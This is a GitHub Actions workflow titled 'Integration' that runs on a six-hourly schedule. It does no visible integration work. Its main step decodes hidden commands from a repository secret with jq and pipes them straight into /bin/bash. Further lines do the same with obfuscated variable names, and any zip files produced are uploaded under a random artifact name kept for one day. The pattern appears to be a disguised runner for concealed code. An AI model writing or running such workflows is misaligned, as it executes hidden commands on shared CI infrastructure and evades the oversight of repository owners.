name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '56 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          t8: ${{ secrets.t8 }}
        run: |
          printf '%s' "$t8" | jq -r .ujewq0234 | /bin/bash
          echo $bcnuw92985 | jq -r .cmay423 | /bin/bash
          echo $y00306 | jq -r .vn0272 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: Vo0cxL8R
          path: "*.zip"
          retention-days: 1
